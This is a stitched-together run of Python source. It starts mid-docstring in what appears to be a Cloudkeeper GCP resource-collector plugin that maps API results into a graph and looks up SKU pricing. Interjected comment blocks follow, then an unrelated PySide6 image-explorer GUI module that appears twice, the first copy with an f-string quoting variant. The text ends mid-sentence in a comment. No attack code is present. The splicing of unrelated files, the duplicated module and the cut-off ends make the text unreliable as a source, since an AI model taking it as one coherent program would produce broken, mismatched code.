""" # The following are default attributes that are passed to every # BaseResource() if found in `result` kwargs = { "id": result.get("id", result.get("name", result.get("selfLink"))), "tags": result.get("labels", {}), "name": result.get("name"), "ctime": iso2datetime(result.get("creationTimestamp")), "link": result.get("selfLink"), "label_fingerprint": result.get("labelFingerprint"), "_account": self.project, } if attr_map is not None: for map_to, map_from in attr_map.items(): data = get_result_data(result, map_from) if data is None: log.debug(f"Attribute {map_from} not in result") continue log.debug(f"Found attribute {map_to}: {pformat(data)}") kwargs[map_to] = data # By default we search for a resources region and/or zone default_search_map = {"_region": ["link", "region"], "_zone": ["link", "zone"]} search_results = {} if search_map is None: search_map = dict(default_search_map) else: updated_search_map = dict(default_search_map) updated_search_map.update(search_map) search_map = updated_search_map for map_to, search_data in search_map.items(): search_attr = search_data[0] search_value_name = search_data[1] search_value = get_result_data(result, search_value_name) if search_value is None: continue if isinstance(search_value, List): search_values = search_value else: search_values = [search_value] for search_value in search_values: search_result = self.graph.search_first(search_attr, search_value) if search_result: if map_to not in search_results: search_results[map_to] = [] search_results[map_to].append(search_result) if ( map_to not in kwargs and map_to in search_results and not str(map_to).startswith("__") ): search_result = search_results[map_to] if len(search_result) == 1: kwargs[map_to] = search_result[0] else: kwargs[map_to] = list(search_result) # If the resource was referencing a zone but not a region we look up its # region based on the zone information we found. # E.g. if we know a disk is in zone us-central1-a then we can find # the region us-central1 from that. if ( "_zone" in kwargs and "_region" not in kwargs and isinstance(kwargs["_zone"], BaseResource) ): region = kwargs["_zone"].region(self.graph) if region: kwargs["_region"] = region if "_region" in search_map.keys() and "_region" not in search_results: search_results["_region"] = region return kwargs, search_results @except_log_and_pass(do_raise=socket.timeout) def collect_something( self, resource_class: Type[BaseResource], paginate_method_name: str = "list", paginate_items_name: str = "items", parent_resource: Union[BaseResource, str] = None, attr_map: Dict = None, search_map: Dict = None, successors: List = None, predecessors: List = None, client_kwargs: Dict = None, resource_kwargs: Dict = None, paginate_subitems_name: str = None, post_process: Callable = None, dump_resource: bool = False, ) -> List: """Collects some resource and adds it to the graph. Args: resource_class: A GCP resource class name that inherits Cloudkeeper's BaseResource paginate_method_name: usually "list" or "aggregatedList" paginate_items_name: key name that contains all the items of our list/aggregatedList request parent_resource: The resources parent resource in the graph. This defaults to the zone or region for local or the project for global resources. attr_map: Dict containing a mapping of GCP API result dict keys to resource_class attributes. See default_attributes() for a detailed description. 
search_map: Dict containing a mapping similar to attr_map except that any results get looked up in `self.graph` instead of just passing the result data as an attribute. successors: List of resource successors (child nodes) predecessors: List of resource predecessors (parent nodes) client_kwargs: **kwargs that get passed to the GCP client resource_kwargs: **kwargs that get passed to the GCP resource paginate_subitems_name: Name of a resource in a aggregatedList result set Defaults to be the name as the client method name. E.g. if we request all disks it'll be {"items": {'zones/...': {'disks': []}} post_process: Callable that is called after a resource has been added to the graph. The resource object and the graph are given as args. dump_resource: If True will log.debug() a dump of the API result. """ client_method_name = resource_class("", {})._client_method default_resource_args = resource_class("", {}).resource_args log.debug(f"Collecting {client_method_name}") if paginate_subitems_name is None: paginate_subitems_name = client_method_name if client_kwargs is None: client_kwargs = {} if resource_kwargs is None: resource_kwargs = {} if successors is None: successors = [] if predecessors is None: predecessors = [] parent_map = {True: predecessors, False: successors} if "project" in default_resource_args: resource_kwargs["project"] = self.project.id client = gcp_client( resource_class.client, resource_class.api_version, credentials=self.credentials, **client_kwargs, ) gcp_resource = getattr(client, client_method_name) if not callable(gcp_resource): raise RuntimeError(f"No method {client_method_name} on client {client}") for resource in paginate( gcp_resource=gcp_resource(), method_name=paginate_method_name, items_name=paginate_items_name, subitems_name=paginate_subitems_name, **resource_kwargs, ): kwargs, search_results = self.default_attributes( resource, attr_map=attr_map, search_map=search_map ) r = resource_class(**kwargs) pr = parent_resource log.debug(f"Adding {r.rtdname} to the graph") if dump_resource: log.debug(f"Resource Dump: {pformat(resource)}") if isinstance(pr, str) and pr in search_results: pr = search_results[parent_resource][0] log.debug(f"Parent resource for {r.rtdname} set to {pr.rtdname}") if not isinstance(pr, BaseResource): pr = kwargs.get("_zone", kwargs.get("_region", self.graph.root)) log.debug( f"Parent resource for {r.rtdname} automatically set to {pr.rtdname}" ) self.graph.add_resource(pr, r) for is_parent, sr_names in parent_map.items(): for sr_name in sr_names: if sr_name in search_results: srs = search_results[sr_name] for sr in srs: if is_parent: src = sr dst = r else: src = r dst = sr self.graph.add_edge(src, dst) else: if sr_name in search_map: graph_search = search_map[sr_name] attr = graph_search[0] value_name = graph_search[1] if value_name in resource: value = resource[value_name] if isinstance(value, List): values = value for value in values: r.add_deferred_connection( attr, value, is_parent ) elif isinstance(value, str): r.add_deferred_connection(attr, value, is_parent) else: log.error( ( "Unable to add deferred connection for" f" value {value} of type {type(value)}" ) ) else: log.error(f"Key {sr_name} is missing in search_map") if callable(post_process): post_process(r, self.graph) # All of the following methods just call collect_something() with some resource # specific options. 
@metrics_collect_regions.time() def collect_regions(self) -> List: def post_process(resource: GCPRegion, graph: Graph): for quota in resource._quotas: if set(["metric", "limit", "usage"]) == set(quota.keys()): q = GCPQuota( quota["metric"], {}, quota=quota["limit"], usage=quota["usage"], _region=resource.region(), _account=resource.account(), _zone=resource.zone(), ctime=resource.ctime, ) graph.add_resource(resource, q) resource._quotas = None self.collect_something( resource_class=GCPRegion, attr_map={"region_status": "status", "quotas": "quotas"}, post_process=post_process, ) @metrics_collect_zones.time() def collect_zones(self) -> List: self.collect_something( resource_class=GCPZone, ) @metrics_collect_disks.time() def collect_disks(self): def volume_status(result): status = result.get("status") num_users = len(result.get("users", [])) if num_users == 0 and status == "READY": status = "AVAILABLE" return status self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPDisk, search_map={ "volume_type": ["link", "type"], "__users": ["link", "users"], }, attr_map={ "volume_size": (lambda r: int(r.get("sizeGb"))), "volume_status": volume_status, "last_attach_timestamp": ( lambda r: iso2datetime( r.get("lastAttachTimestamp", r["creationTimestamp"]) ) ), "last_detach_timestamp": ( lambda r: iso2datetime( r.get("lastDetachTimestamp", r["creationTimestamp"]) ) ), }, predecessors=["volume_type"], successors=["__users"], ) @metrics_collect_instances.time() def collect_instances(self): def post_process(resource: GCPInstance, graph: Graph): """Post process instance resources The first time we encounter a custom machine type we will fetch its details. This is because the machineTypes API's list/aggregatedList functions only return predefined machine types. Custom ones have to be fetched individually when we encounter them on a instance. Once added to the graph Cloudkeeper will find it for successive instances of the same machine type. 
""" if resource.instance_type == "" and "custom" in resource._machine_type_link: log.debug(f"Fetching custom instance type for {resource.rtdname}") machine_type = GCPMachineType( resource._machine_type_link.split("/")[-1], {}, _zone=resource.zone(graph), _account=resource.account(graph), link=resource._machine_type_link, ) resource._machine_type_link = None kwargs = {str(machine_type._get_identifier): machine_type.name} common_kwargs = common_resource_kwargs(machine_type) kwargs.update(common_kwargs) gr = gcp_resource(machine_type) request = gr.get(**kwargs) result = request.execute() machine_type.id = result.get("id") machine_type.instance_cores = float(result.get("guestCpus")) machine_type.instance_memory = float(result.get("memoryMb", 0) / 1024) graph.add_resource(machine_type.zone(graph), machine_type) graph.add_edge(machine_type, resource) self.post_process_machine_type(machine_type, graph) resource._machine_type = machine_type self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPInstance, post_process=post_process, search_map={ "__network": [ "link", ( lambda r: next(iter(r.get("networkInterfaces", [])), {}).get( "network" ) ), ], "__subnetwork": [ "link", ( lambda r: next(iter(r.get("networkInterfaces", [])), {}).get( "subnetwork" ) ), ], "machine_type": ["link", "machineType"], }, attr_map={ "instance_status": "status", "machine_type_link": "machineType", }, predecessors=["__network", "__subnetwork", "machine_type"], ) @metrics_collect_disk_types.time() def collect_disk_types(self): def post_process(resource: GCPDiskType, graph: Graph): if ( resource.region(graph).name == "undefined" and resource.zone(graph).name == "undefined" ): log.error( f"Resource {resource.rtdname} has no region or zone" " - removing from graph" ) graph.remove_node(resource) return log.debug( ( f"Looking up pricing for {resource.rtdname}" f" in {resource.location(graph).rtdname}" ) ) resource_group_map = { "local-ssd": "LocalSSD", "pd-balanced": "SSD", "pd-ssd": "SSD", "pd-standard": "PDStandard", } resource_group = resource_group_map.get(resource.name) skus = [] for sku in graph.searchall( { "kind": "gcp_service_sku", "resource_family": "Storage", "usage_type": "OnDemand", "resource_group": resource_group, } ): try: if resource.region(graph).name not in sku.geo_taxonomy_regions: continue except TypeError: log.exception( f"Problem accessing geo_taxonomy_regions in {sku.rtdname}:" f" {type(sku.geo_taxonomy_regions)}" ) if resource.name == "pd-balanced" and not sku.name.startswith( "Balanced" ): continue if resource.name != "pd-balanced" and sku.name.startswith("Balanced"): continue if resource.zone(graph).name != "undefined" and sku.name.startswith( "Regional" ): continue if ( resource.zone(graph).name == "undefined" and not sku.name.startswith("Regional") and resource.name != "pd-balanced" ): continue skus.append(sku) if len(skus) == 1: graph.add_edge(skus[0], resource) resource.ondemand_cost = skus[0].usage_unit_nanos / 1000000000 else: log.debug(f"Unable to determine SKU for {resource}") self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPDiskType, post_process=post_process, ) @metrics_collect_networks.time() def collect_networks(self): self.collect_something( resource_class=GCPNetwork, ) @metrics_collect_subnetworks.time() def collect_subnetworks(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPSubnetwork, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) 
@metrics_collect_vpn_tunnels.time() def collect_vpn_tunnels(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPVPNTunnel, search_map={ "__vpn_gateway": ["link", "vpnGateway"], "__target_vpn_gateway": ["link", "targetVpnGateway"], }, successors=["__target_vpn_gateway", "__vpn_gateway"], ) @metrics_collect_vpn_gateways.time() def collect_vpn_gateways(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPVPNGateway, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_target_vpn_gateways.time() def collect_target_vpn_gateways(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPTargetVPNGateway, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_routers.time() def collect_routers(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPRouter, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_routes.time() def collect_routes(self): self.collect_something( resource_class=GCPRoute, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_security_policies.time() def collect_security_policies(self): self.collect_something(resource_class=GCPSecurityPolicy) @metrics_collect_snapshots.time() def collect_snapshots(self): self.collect_something( resource_class=GCPSnapshot, search_map={ "volume_id": ["link", "sourceDisk"], }, attr_map={ "volume_size": lambda r: int(r.get("diskSizeGb", -1)), "storage_bytes": lambda r: int(r.get("storageBytes", -1)), }, ) @metrics_collect_ssl_certificates.time() def collect_ssl_certificates(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPSSLCertificate, attr_map={ "ctime": lambda r: iso2datetime(r.get("creationTimestamp")), "expires": lambda r: iso2datetime(r.get("expireTime")), "description": "description", "certificate": "certificate", "certificate_type": "type", "certificate_managed": "managed", "subject_alternative_names": "subjectAlternativeNames", }, search_map={ "__user": ["link", "user"], }, successors=["__user"], ) @staticmethod def post_process_machine_type(resource: GCPMachineType, graph: Graph): """Adds edges from machine type to SKUs and determines ondemand pricing TODO: Implement GPU types """ if ( resource.region(graph).name == "undefined" and resource.zone(graph).name == "undefined" ): log.error( f"Resource {resource.rtdname} has no region or zone" " - removing from graph" ) graph.remove_node(resource) return log.debug( ( f"Looking up pricing for {resource.rtdname}" f" in {resource.location(graph).rtdname}" ) ) skus = [] for sku in graph.searchall( { "kind": "gcp_service_sku", "resource_family": "Compute", "usage_type": "OnDemand", } ): if sku.resource_group not in ( "G1Small", "F1Micro", "N1Standard", "CPU", "RAM", ): continue if ("custom" not in resource.name and "Custom" in sku.name) or ( "custom" in resource.name and "Custom" not in sku.name ): continue if resource.region(graph).name not in sku.geo_taxonomy_regions: continue if resource.name == "g1-small" and sku.resource_group != "G1Small": continue if resource.name == "f1-micro" and sku.resource_group != "F1Micro": continue if ( resource.name.startswith("n2d-") and not sku.name.startswith("N2D AMD ") ) or ( not resource.name.startswith("n2d-") and sku.name.startswith("N2D AMD ") ): continue if (resource.name.startswith("n2-") and not 
sku.name.startswith("N2 ")) or ( not resource.name.startswith("n2-") and sku.name.startswith("N2 ") ): continue if ( resource.name.startswith("m1-") and not sku.name.startswith("Memory-optimized ") ) or ( not resource.name.startswith("m1-") and sku.name.startswith("Memory-optimized ") ): continue if ( resource.name.startswith("c2-") and not sku.name.startswith("Compute optimized ") ) or ( not resource.name.startswith("c2-") and sku.name.startswith("Compute optimized ") ): continue if resource.name.startswith("n1-") and sku.resource_group != "N1Standard": continue if "custom" not in resource.name: if ( resource.name.startswith("e2-") and not sku.name.startswith("E2 ") ) or ( not resource.name.startswith("e2-") and sku.name.startswith("E2 ") ): continue skus.append(sku) if len(skus) == 1 and resource.name in ("g1-small", "f1-micro"): graph.add_edge(skus[0], resource) resource.ondemand_cost = skus[0].usage_unit_nanos / 1000000000 elif len(skus) == 2 or (len(skus) == 3 and "custom" in resource.name): ondemand_cost = 0 cores = resource.instance_cores ram = resource.instance_memory extended_memory_pricing = False if "custom" in resource.name: extended_memory_pricing = ram / cores > 8 for sku in skus: if "Core" in sku.name: ondemand_cost += sku.usage_unit_nanos * cores elif "Ram" in sku.name: if (extended_memory_pricing and "Extended" not in sku.name) or ( not extended_memory_pricing and "Extended" in sku.name ): continue ondemand_cost += sku.usage_unit_nanos * ram graph.add_edge(sku, resource) if ondemand_cost > 0: resource.ondemand_cost = ondemand_cost / 1000000000 else: log.debug( ( f"Unable to determine SKU(s) for {resource}:" f" {[sku.dname for sku in skus]}" ) ) @metrics_collect_machine_types.time() def collect_machine_types(self): self.collect_something( resource_class=GCPMachineType, paginate_method_name="aggregatedList", search_map={ "_zone": ["name", "zone"], }, attr_map={ "instance_cores": lambda r: float(r.get("guestCpus", 0)), "instance_memory": lambda r: float(r.get("memoryMb", 0) / 1024), }, post_process=self.post_process_machine_type, ) @metrics_collect_network_endpoint_groups.time() def collect_network_endpoint_groups(self): self.collect_something( resource_class=GCPNetworkEndpointGroup, paginate_method_name="aggregatedList", search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, attr_map={ "default_port": "defaultPort", "neg_type": "networkEndpointType", }, predecessors=["__network", "__subnetwork"], ) @metrics_collect_global_network_endpoint_groups.time() def collect_global_network_endpoint_groups(self): self.collect_something( resource_class=GCPGlobalNetworkEndpointGroup, search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, attr_map={ "default_port": "defaultPort", "neg_type": "networkEndpointType", }, predecessors=["__network", "__subnetwork"], ) @metrics_collect_instance_groups.time() def collect_instance_groups(self): def post_process(resource: GCPInstanceGroup, graph: Graph): kwargs = {"instanceGroup": resource.name} kwargs.update(common_resource_kwargs(resource)) log.debug(f"Getting instances for {resource}") for r in paginate( gcp_resource=gcp_resource(resource, graph), method_name="listInstances", items_name="items", **kwargs, ): i = graph.search_first("link", r.get("instance")) if i: graph.add_edge(i, resource) self.collect_something( resource_class=GCPInstanceGroup, paginate_method_name="aggregatedList", search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, 
predecessors=["__network", "__subnetwork"], post_process=post_process, ) @metrics_collect_instance_group_managers.time() def collect_instance_group_managers(self): self.collect_something( resource_class=GCPInstanceGroupManager, paginate_method_name="aggregatedList", search_map={ "__instance_group": ["link", "instanceGroup"], "__health_checks": [ "link", ( lambda r: [ hc.get("healthCheck", "") for hc in r.get("autoHealingPolicies", []) ] ), ], }, predecessors=["__instance_group", "__health_checks"], ) @metrics_collect_autoscalers.time() def collect_autoscalers(self): self.collect_something( resource_class=GCPAutoscaler, paginate_method_name="aggregatedList", search_map={ "__instance_group_manager": ["link", "target"], }, attr_map={ "min_size": ( lambda r: r.get("autoscalingPolicy", {}).get("minNumReplicas", -1) ), "max_size": ( lambda r: r.get("autoscalingPolicy", {}).get("maxNumReplicas", -1) ), }, successors=["__instance_group_manager"], ) @metrics_collect_health_checks.time() def collect_health_checks(self): self.collect_something( resource_class=GCPHealthCheck, paginate_method_name="aggregatedList", attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "health_check_type": "type", }, ) @metrics_collect_http_health_checks.time() def collect_http_health_checks(self): self.collect_something( resource_class=GCPHTTPHealthCheck, attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "host": "host", "request_path": "requestPath", "port": "port", }, ) @metrics_collect_https_health_checks.time() def collect_https_health_checks(self): self.collect_something( resource_class=GCPHTTPSHealthCheck, attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "health_check_type": "type", "host": "host", "request_path": "requestPath", "port": "port", }, ) @metrics_collect_url_maps.time() def collect_url_maps(self): self.collect_something( resource_class=GCPUrlMap, paginate_method_name="aggregatedList", search_map={ "__default_service": ["link", "defaultService"], }, successors=["__default_service"], ) @metrics_collect_target_pools.time() def collect_target_pools(self): self.collect_something( resource_class=GCPTargetPool, paginate_method_name="aggregatedList", search_map={ "__health_checks": ["link", "healthChecks"], "__instances": ["link", "instances"], }, attr_map={ "session_affinity": "sessionAffinity", "failover_ratio": "failoverRatio", }, predecessors=["__instances", "__health_checks"], ) @metrics_collect_target_instances.time() def collect_target_instances(self): self.collect_something( resource_class=GCPTargetInstance, paginate_method_name="aggregatedList", search_map={ "__instance": ["link", "instance"], }, predecessors=["__instance"], ) @metrics_collect_target_http_proxies.time() def collect_target_http_proxies(self): self.collect_something( resource_class=GCPTargetHttpProxy, paginate_method_name="aggregatedList", search_map={ "__url_map": ["link", "urlMap"], }, predecessors=["__url_map"], ) @metrics_collect_target_https_proxies.time() def collect_target_https_proxies(self): self.collect_something( resource_class=GCPTargetHttpsProxy, paginate_method_name="aggregatedList", search_map={ "__url_map": ["link", "urlMap"], "__ssl_certificates": ["link", "sslCertificates"], }, 
predecessors=["__url_map", "__ssl_certificates"], ) @metrics_collect_target_ssl_proxies.time() def collect_target_ssl_proxies(self): self.collect_something( resource_class=GCPTargetSslProxy, search_map={ "__service": ["link", "service"], "__ssl_certificates": ["link", "sslCertificates"], }, predecessors=["__service", "__ssl_certificates"], ) @metrics_collect_target_tcp_proxies.time() def collect_target_tcp_proxies(self): self.collect_something( resource_class=GCPTargetTcpProxy, search_map={ "__service": ["link", "service"], }, predecessors=["__service"], ) @metrics_collect_target_grpc_proxies.time() def collect_target_grpc_proxies(self): self.collect_something( resource_class=GCPTargetGrpcProxy, search_map={ "__url_map": ["link", "urlMap"], }, predecessors=["__url_map"], ) @metrics_collect_backend_services.time() def collect_backend_services(self): self.collect_something( resource_class=GCPBackendService, paginate_method_name="aggregatedList", search_map={ "__health_checks": ["link", "healthChecks"], "__backends": [ "link", (lambda r: [g.get("group", "") for g in r.get("backends", [])]), ], }, predecessors=["__health_checks", "__backends"], ) @metrics_collect_forwarding_rules.time() def collect_forwarding_rules(self): def post_process(resource: GCPForwardingRule, graph: Graph): instances = [ i.name for i in resource.ancestors(graph) if isinstance(i, GCPInstance) ] if len(instances) > 0: resource.backends = sorted(instances) self.collect_something( resource_class=GCPForwardingRule, paginate_method_name="aggregatedList", attr_map={ "ip_address": "IPAddress", "ip_protocol": "IPProtocol", "load_balancing_scheme": "loadBalancingScheme", "network_tier": "networkTier", "port_range": "portRange", }, search_map={ "__target": ["link", "target"], }, predecessors=["__target"], post_process=post_process, ) @metrics_collect_global_forwarding_rules.time() def collect_global_forwarding_rules(self): self.collect_something( resource_class=GCPGlobalForwardingRule, attr_map={ "ip_address": "IPAddress", "ip_protocol": "IPProtocol", "load_balancing_scheme": "loadBalancingScheme", "network_tier": "networkTier", "port_range": "portRange", }, search_map={ "__target": ["link", "target"], }, predecessors=["__target"], ) @metrics_collect_buckets.time() def collect_buckets(self): self.collect_something( resource_class=GCPBucket, attr_map={ "ctime": lambda r: iso2datetime(r.get("timeCreated")), "mtime": lambda r: iso2datetime(r.get("updated")), "bucket_location": "location", "bucket_location_type": "locationType", "storage_class": "storageClass", "zone_separation": "zoneSeparation", }, ) @metrics_collect_databases.time() def collect_databases(self): self.collect_something( resource_class=GCPDatabase, attr_map={ "db_type": "databaseVersion", "db_status": "state", "db_endpoint": lambda r: next( iter( [ ip["ipAddress"] for ip in r.get("ipAddresses", []) if ip.get("type") == "PRIMARY" ] ), None, ), "instance_type": lambda r: r.get("settings", {}).get("tier"), "volume_size": lambda r: int( r.get("settings", {}).get("dataDiskSizeGb", -1) ), "tags": lambda r: r.get("settings", {}).get("userLabels", {}), }, search_map={ "_region": ["name", "region"], "_zone": ["name", "gceZone"], }, ) @metrics_collect_services.time() def collect_services(self): def post_process(service: GCPService, graph: Graph): # Right now we are only interested in Compute Engine pricing if service.name != "Compute Engine": return gs = gcp_client("cloudbilling", "v1", credentials=self.credentials) kwargs = {"parent": f"services/{service.id}"} for r in 
paginate( gcp_resource=gs.services().skus(), method_name="list", items_name="skus", **kwargs, ): sku = GCPServiceSKU( r["skuId"], {}, name=r.get("description"), service=r.get("category", {}).get("serviceDisplayName"), resource_family=r.get("category", {}).get("resourceFamily"), resource_group=r.get("category", {}).get("resourceGroup"), usage_type=r.get("category", {}).get("usageType"), pricing_info=r.get("pricingInfo"), service_provider_name=r.get("serviceProviderName"), geo_taxonomy_type=r.get("geoTaxonomy", {}).get("type"), geo_taxonomy_regions=r.get("geoTaxonomy", {}).get("regions"), link=( f"https://{service.client}.googleapis.com/" f"{service.api_version}/{r.get('name')}" ), _account=service.account(graph), _region=service.region(graph), _zone=service.zone(graph), ) graph.add_resource(service, sku) self.collect_something( resource_class=GCPService, paginate_method_name="list", paginate_items_name="services", attr_map={ "id": "serviceId", "name": "displayName", }, post_process=post_process, ) @metrics_collect_instance_templates.time() def collect_instance_templates(self): self.collect_something( resource_class=GCPInstanceTemplate, search_map={ "__machine_type": ["link", "machineType"], }, predecessors=["__machine_type"], )
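# --- Illustrative note (not part of the plugin source) ----------------------
# Every collect_*() method above is a thin wrapper around collect_something(),
# which uses default_attributes() to turn one API result dict into resource
# kwargs: attr_map values are either plain result keys or callables that
# receive the whole result, and search_map keys starting with "__" only
# produce graph edges. The helper below is a stripped-down re-statement of the
# attr_map handling for illustration only; the real logic lives in
# get_result_data() and default_attributes().

def apply_attr_map(result: dict, attr_map: dict) -> dict:
    """Resolve attr_map entries against a single API result dict."""
    kwargs = {}
    for map_to, map_from in attr_map.items():
        value = map_from(result) if callable(map_from) else result.get(map_from)
        if value is not None:
            kwargs[map_to] = value
    return kwargs


if __name__ == "__main__":
    disk = {"sizeGb": "10", "status": "READY"}
    print(apply_attr_map(disk, {
        "volume_size": (lambda r: int(r.get("sizeGb"))),
        "volume_status": "status",
    }))
    # -> {'volume_size': 10, 'volume_status': 'READY'}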
import importlib import inspect import os from pathlib import Path from PySide6.QtCore import QDir, QSize from PySide6.QtWidgets import QFileDialog, QListWidget, QTabWidget from cilissa.images import Image from cilissa.operations import Metric, Transformation from cilissa_gui.decorators import PathInsert from cilissa_gui.widgets import CQImageItem, CQInfoDialog, CQOperationItem class Explorer(QTabWidget): IMAGE_EXTENSIONS = ["*.png", "*.jpg", "*.jpeg", "*.bmp", "*.tiff"] def __init__(self) -> None: super().__init__() self.images_tab = ImagesTab(self) self.metrics_tab = MetricsTab(self) self.transformations_tab = TransformationsTab(self) self.addTab(self.images_tab, "Images") self.addTab(self.metrics_tab, "Metrics") self.addTab(self.transformations_tab, "Transformations") self.currentChanged.connect(self.clear_selection_in_tabs) def clear_selection_in_tabs(self) -> None: for index in range(self.count()): self.widget(index).clearSelection() def open_image_dialog(self) -> None: # This returns a tuple ([filenames], "filter"), we are interested only in the filenames filenames = QFileDialog.getOpenFileNames( self, "Open images...", "", f"Images ({" ".join([ext for ext in self.IMAGE_EXTENSIONS])})" )[0] for fn in filenames: image = Image(fn) cq_image = CQImageItem(image, width=128, height=128) self.images_tab.addItem(cq_image) def open_image_folder_dialog(self) -> None: dirname = QFileDialog.getExistingDirectory(self, "Open images folder...", "", QFileDialog.ShowDirsOnly) d = QDir(dirname) if dirname and not d.entryList(self.IMAGE_EXTENSIONS): dialog = CQInfoDialog("No images found in the selected folder", "No images found") dialog.exec() return for fn in d.entryList(self.IMAGE_EXTENSIONS): image = Image(Path(dirname, fn)) cq_image = CQImageItem(image, width=128, height=128) self.images_tab.addItem(cq_image) def load_plugin(self) -> None: filename = QFileDialog.getOpenFileName(self, "Open Python plugin", "", "Python files (*.py)")[0] with PathInsert(os.path.dirname(filename)): spec = importlib.util.spec_from_file_location(filename, filename) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) for _, attr in inspect.getmembers(module): if not inspect.isclass(attr): continue if issubclass(attr, Metric) and attr != Metric: self.metrics_tab.addItem(CQOperationItem(attr)) elif issubclass(attr, Transformation) and attr != Transformation: self.transformations_tab.addItem(CQOperationItem(attr)) class ExplorerTab(QListWidget): def __init__(self, parent: QTabWidget) -> None: super().__init__() self.setViewMode(QListWidget.IconMode) self.setIconSize(QSize(82, 82)) self.setUniformItemSizes(True) self.setMovement(QListWidget.Static) self.setResizeMode(QListWidget.Adjust) self.setFrameStyle(QListWidget.NoFrame) self.setMaximumWidth(parent.width()) def remove_selected(self) -> None: rows = [index.row() for index in self.selectedIndexes()] for row in reversed(rows): self.takeItem(row) class ImagesTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) self.setSelectionMode(QListWidget.ExtendedSelection) class MetricsTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) for metric in Metric.get_subclasses(): self.addItem(CQOperationItem(metric)) class TransformationsTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) for transformation in Transformation.get_subclasses(): self.addItem(CQOperationItem(transformation))
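# --- Illustrative note (not part of the GUI source) --------------------------
# The file filter built inside open_image_dialog() above is simply the
# IMAGE_EXTENSIONS list joined with spaces, so QFileDialog receives the string
# "Images (*.png *.jpg *.jpeg *.bmp *.tiff)". A minimal reproduction of that
# expression outside the widget:

IMAGE_EXTENSIONS = ["*.png", "*.jpg", "*.jpeg", "*.bmp", "*.tiff"]
print(f"Images ({' '.join(IMAGE_EXTENSIONS)})")  # -> Images (*.png *.jpg *.jpeg *.bmp *.tiff)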
import importlib import inspect import os from pathlib import Path from PySide6.QtCore import QDir, QSize from PySide6.QtWidgets import QFileDialog, QListWidget, QTabWidget from cilissa.images import Image from cilissa.operations import Metric, Transformation from cilissa_gui.decorators import PathInsert from cilissa_gui.widgets import CQImageItem, CQInfoDialog, CQOperationItem class Explorer(QTabWidget): IMAGE_EXTENSIONS = ["*.png", "*.jpg", "*.jpeg", "*.bmp", "*.tiff"] def __init__(self) -> None: super().__init__() self.images_tab = ImagesTab(self) self.metrics_tab = MetricsTab(self) self.transformations_tab = TransformationsTab(self) self.addTab(self.images_tab, "Images") self.addTab(self.metrics_tab, "Metrics") self.addTab(self.transformations_tab, "Transformations") self.currentChanged.connect(self.clear_selection_in_tabs) def clear_selection_in_tabs(self) -> None: for index in range(self.count()): self.widget(index).clearSelection() def open_image_dialog(self) -> None: # This returns a tuple ([filenames], "filter"), we are interested only in the filenames filenames = QFileDialog.getOpenFileNames( self, "Open images...", "", f"Images ({' '.join([ext for ext in self.IMAGE_EXTENSIONS])})" )[0] for fn in filenames: image = Image(fn) cq_image = CQImageItem(image, width=128, height=128) self.images_tab.addItem(cq_image) def open_image_folder_dialog(self) -> None: dirname = QFileDialog.getExistingDirectory(self, "Open images folder...", "", QFileDialog.ShowDirsOnly) d = QDir(dirname) if dirname and not d.entryList(self.IMAGE_EXTENSIONS): dialog = CQInfoDialog("No images found in the selected folder", "No images found") dialog.exec() return for fn in d.entryList(self.IMAGE_EXTENSIONS): image = Image(Path(dirname, fn)) cq_image = CQImageItem(image, width=128, height=128) self.images_tab.addItem(cq_image) def load_plugin(self) -> None: filename = QFileDialog.getOpenFileName(self, "Open Python plugin", "", "Python files (*.py)")[0] with PathInsert(os.path.dirname(filename)): spec = importlib.util.spec_from_file_location(filename, filename) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) for _, attr in inspect.getmembers(module): if not inspect.isclass(attr): continue if issubclass(attr, Metric) and attr != Metric: self.metrics_tab.addItem(CQOperationItem(attr)) elif issubclass(attr, Transformation) and attr != Transformation: self.transformations_tab.addItem(CQOperationItem(attr)) class ExplorerTab(QListWidget): def __init__(self, parent: QTabWidget) -> None: super().__init__() self.setViewMode(QListWidget.IconMode) self.setIconSize(QSize(82, 82)) self.setUniformItemSizes(True) self.setMovement(QListWidget.Static) self.setResizeMode(QListWidget.Adjust) self.setFrameStyle(QListWidget.NoFrame) self.setMaximumWidth(parent.width()) def remove_selected(self) -> None: rows = [index.row() for index in self.selectedIndexes()] for row in reversed(rows): self.takeItem(row) class ImagesTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) self.setSelectionMode(QListWidget.ExtendedSelection) class MetricsTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) for metric in Metric.get_subclasses(): self.addItem(CQOperationItem(metric)) class TransformationsTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) for transformation in Transformation.get_subclasses(): self.addItem(CQOperationItem(transformation))
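# --- Illustrative note (not part of the GUI source) --------------------------
# Explorer.load_plugin() above imports an arbitrary .py file and registers
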